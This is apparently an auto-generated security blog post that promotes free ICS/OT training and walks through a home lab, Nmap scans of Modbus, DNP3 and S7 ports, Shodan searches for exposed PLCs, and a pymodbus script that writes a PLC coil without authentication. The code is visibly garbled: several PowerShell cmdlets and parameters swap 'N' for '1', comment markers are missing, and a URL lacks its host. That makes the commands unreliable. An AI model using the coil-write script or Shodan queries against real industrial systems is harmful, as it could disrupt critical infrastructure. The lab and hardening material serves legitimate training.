UNLOCK 50+ HOURS OF FREE ICS/OT CYBERSECURITY TRAINING: Mike Holcomb’s Ultimate Resource Compilation + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

Industrial Control Systems (ICS) and Operational Technology (OT) environments—power grids, water treatment plants, manufacturing lines—were designed for reliability, not security. As IT and OT converge, attackers increasingly target these critical infrastructures (e.g., Colonial Pipeline, Triton). Mike Holcomb’s curated list of free resources, including a 25+ hour course, 50+ YouTube hours, and a weekly newsletter, offers a no‑cost pathway to mastering OT/ICS defense.

Learning Objectives:

• Identify and access top free ICS/OT cybersecurity training resources (courses, eBooks, videos, infographics).
• Execute practical Linux/Windows commands and scripts to enumerate, monitor, and harden OT networks.
• Apply ISA/IEC 62443 principles and basic penetration testing techniques to real‑world industrial environments.

You Should Know

1. Build Your Own ICS/OT Virtual Lab – Free & Safe for Practice

What this does:

A virtual lab lets you simulate PLCs, HMIs, and industrial protocols without risking real equipment. You will use VirtualBox and open‑source tools (OpenPLC, GRFICS) to create a realistic training ground.

Step‑by‑step guide:

1. Install VirtualBox (Linux: sudo apt install virtualbox; Windows: download from virtualbox.org).
2. Download a pre‑built ICS VM – e.g., GRFICS (github.com/glennshen/grfics) or the “ICS‑Cyber” VM from SANS.

3. Set up OpenPLC on a Ubuntu VM:

sudo apt update && sudo apt install git python3-pip
git clone https://github.com/thiagoralves/OpenPLC_v3.git
cd OpenPLC_v3
./install.sh

4. Launch the web interface at `http://:8080` and upload a simple ladder logic program.
5. Configure a second “attacker” VM (Kali Linux) on the same virtual network (NAT or Host‑Only).
6. Verify connectivity from attacker to PLC using ping and Nmap (covered in next section).

1. Scanning OT Networks with Nmap – Discover Modbus, DNP3, and S7

What this does:

Nmap’s industrial‑protocol scripts identify live PLCs, services, and potential misconfigurations. These commands are safe for lab use but can disrupt live OT – never run on production.

Commands & examples:

• Modbus/TCP discovery (port 502):

  nmap -sV -p 502 --script modbus-discover 192.168.1.0/24
  

• DNP3 enumeration (port 20000):

  nmap -sU -p 20000 --script dnp3-info 192.168.1.100
  

• Siemens S7‑300/400 (port 102):

  nmap -p 102 --script s7-info 192.168.1.10
  

• Full OT network sweep with timing relaxed (to avoid flooding):

  nmap -T4 -p 502,102,20000,44818 -sV -oA ot_scan 192.168.1.0/24
  

• Windows alternative – use PowerShell and `Test-1etConnection` for basic port checks:

  1..254 | ForEach-Object { Test-1etConnection -Port 502 -ComputerName "192.168.1.$_" -WarningAction SilentlyContinue }
  

Step‑by‑step:

1. Run `sudo nmap -sS -p 502 192.168.1.10` (replace IP with your lab PLC).
2. If open, escalate to script scan: --script modbus-discover.
3. Review output for unit identifiers, slave IDs, and read/write coil access.

3. Capturing & Analyzing Industrial Protocols with Wireshark

What this does:

Wireshark reveals exactly what commands travel between HMI and PLC – invaluable for anomaly detection and forensics.

Filters & commands:

• Capture only Modbus traffic – filter `modbus` or tcp.port == 502.
• Follow a Modbus/TCP stream – right‑click any packet → Follow → TCP Stream.
• Export Modbus objects – File → Export Objects → Modbus.
• Linux CLI capture with tcpdump (pipe to Wireshark later):

  sudo tcpdump -i eth0 -s 0 -w ot_traffic.pcap 'tcp port 502 or udp port 20000'
  

• Windows equivalent (Wireshark installed): `windump -i 2 -w ot_traffic.pcap port 502`

Step‑by‑step guide:

1. Start Wireshark on the attacker VM, select the interface connected to the OT lab network.
2. Start capture, then from your HMI (or using modbus-cli) write a coil:

   modbus-cli write-coil localhost 502 1 true
   

3. Stop capture and apply filter `modbus.func_code == 5` (write single coil).
4. Observe how a simple write command appears in clear text – demonstrates lack of encryption in legacy Modbus.

4. Hardening Windows‑Based Engineering Workstations (EWS)

What this does:

Most OT engineers use Windows workstations connected to PLCs. Attackers pivot through these hosts. Below commands disable risky defaults.

PowerShell (run as Administrator):

 Disable unnecessary services (e.g., Print Spooler, LLMNR)
Set-Service -1ame Spooler -StartupType Disabled
Set-Service -1ame Spooler -Status Stopped
Stop-Service -1ame "LLMNR" -Force

Restrict RDP to specific OT subnet (replace 192.168.1.0)
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
netsh advfirewall firewall add rule name="RDP_OT" dir=in protocol=tcp localport=3389 remoteip=192.168.1.0/24 action=allow

Block outbound SMB (port 445) to prevent lateral movement
New-1etFirewallRule -DisplayName "Block SMB Outbound" -Direction Outbound -Protocol TCP -LocalPort 445 -Action Block

Linux (if an EWS runs Ubuntu) – disable unnecessary listeners:

sudo systemctl disable cups-browsed avahi-daemon
sudo ufw default deny incoming
sudo ufw allow from 192.168.1.0/24 to any port 22  SSH only from OT net

Step‑by‑step:

1. List all open ports on EWS: `netstat -an` (Windows) or `ss -tuln` (Linux).
2. Apply above firewall rules to lock down non‑essential ports.
3. Test connectivity from a non‑OT IP – should fail for RDP and SMB.

4. Using Shodan to Identify Exposed ICS Devices (with API)

What this does:

Shodan indexes internet‑connected devices. Many organizations accidentally expose PLCs, RTUs, or HMIs. This tutorial shows how to query Shodan ethically (only on your own assets or with permission).

Commands (Linux/macOS with Shodan CLI):

 Install Shodan CLI
pip3 install shodan
shodan init YOUR_API_KEY

Search for Modbus devices in a specific country
shodan search --limit 10 'port:502 modbus country:"US"'

Look for default Niagara Fox (HVAC) ports
shodan search 'port:1911,4911 product:"Niagara"'

Get detailed info on an exposed IP (replace IP)
shodan host 203.0.113.5

Windows – use browser or PowerShell (invoke‑restmethod with Shodan API):

$apiKey = "YOUR_API_KEY"
$search = "port:502"
$url = "https://api.shodan.io/shodan/host/search?key=$apiKey&query=$search"
Invoke-RestMethod -Uri $url | ConvertTo-Json -Depth 3

Step‑by‑step:

1. Sign up at shodan.io (free tier).

1. Run a search for `”siemens s7″ port:102` – note how many are live.
2. Never attempt to connect without written authorization – use only for awareness and to convince management of exposure.

6. Basic Modbus Enumeration with Python (pymodbus)

What this does:

Automate reading/writing coils and registers to test authorization controls and discover undocumented memory areas.

Python script (run from attacker VM):

from pymodbus.client import ModbusTcpClient
import sys

client = ModbusTcpClient('192.168.1.10', port=502)
client.connect()

Read holding registers (address 0, count 10)
rr = client.read_holding_registers(0, 10, unit=1)
if not rr.isError():
print(f"Holding registers: {rr.registers}")
else:
print(f"Error: {rr}")

Write a single coil (address 5, ON)
client.write_coil(5, True, unit=1)

Attempt to read coils 0-15
coils = client.read_coils(0, 16, unit=1)
print(f"Coil values: {coils.bits}")

client.close()

Step‑by‑step:

1. Install pymodbus: `pip3 install pymodbus`.

1. Save script as `modbus_enum.py` and run: python3 modbus_enum.py.
2. Observe that without authentication or access controls, you can change coil states – this is a major OT risk.

3. Implementing ISA/IEC 62443 – A Quick Hardening Checklist

What this does:

The ISA/IEC 62443 series defines security levels (SL1–SL4) for IACS. Below are actionable steps based on the standard.

Checklist & commands (apply on network devices, firewalls, PLCs):
– Network segmentation (IEC 62443‑3‑3): Use VLANs or air‑gapped interfaces. On a Linux router:

 Create VLAN for OT
ip link add link eth0 name eth0.10 type vlan id 10
ip addr add 192.168.10.1/24 dev eth0.10
iptables -A FORWARD -i eth0.10 -o eth0 -j DROP  block OT→IT by default

– Disable unused protocols on PLCs (e.g., FTP, HTTP) – consult vendor manual.
– Enable logging on switches/routers (Syslog to a secure collector):

 Example on Cisco IOS
logging 192.168.100.50
logging trap warnings

– Hard‑coded credentials – change all default passwords (e.g., many Siemens PLCs have default admin:admin).
– Windows security baseline – apply Microsoft’s Security Compliance Toolkit for OT.

Step‑by‑step:

1. Identify your target security level (SL1 = basic protection, SL4 = advanced).
2. Implement zone and conduit model – define OT zone, IT zone, and conduits (e.g., firewall rules).
3. Test from IT zone: try to ping an OT PLC – should fail if correctly segmented.
4. Review logs weekly using a SIEM (e.g., Splunk free tier, Wazuh).

What Undercode Say:

• Key Takeaway 1: Free, high‑quality OT/ICS training is abundant – Mike Holcomb’s resources (YouTube, eBooks, 25+ hour course) remove the “expensive barrier” argument for getting started.
• Key Takeaway 2: Practical skills require a lab and hands‑on commands. Without tools like Nmap, Modbus‑client, or Wireshark filters, theory alone won’t defend industrial networks.

Analysis (≈10 lines):

The convergence of IT and OT means that traditional security professionals must now understand Modbus, DNP3, and ladder logic – yet most training remains locked behind paywalls. Holcomb’s compilation lowers that barrier, but the bigger issue is organizational inertia: many plant managers still believe “air gap” equals safety. The commands and steps above (especially Shodan scans and Modbus enumeration) prove otherwise – exposure is rampant. The most valuable resource listed is the ISA/IEC 62443 course, because standards drive budgets. However, free resources only help if practitioners actually build labs. The newsletter with 8,200+ subscribers indicates growing awareness, but that’s a fraction of the needed workforce. Expect a surge in OT‑focused CTFs and home‑lab tutorials as these links spread.

Prediction:

• +1 Increased adoption of free OT training will expand the pool of qualified ICS incident responders, shortening breach detection times.
• +1 Open‑source tools (like OpenPLC and pymodbus) will become standard teaching aids in universities, leading to more secure defaults in next‑gen industrial devices.
• -1 Attackers will also use these same resources (e.g., Shodan dorks, Modbus scripts) to refine their targeting of exposed critical infrastructure – awareness alone is not defense.
• -1 Without parallel investment in secure remote access and asset inventory, the proliferation of free “pen testing” content may lead to amateur practitioners taking down production lines.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Mikeholcomb Want – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky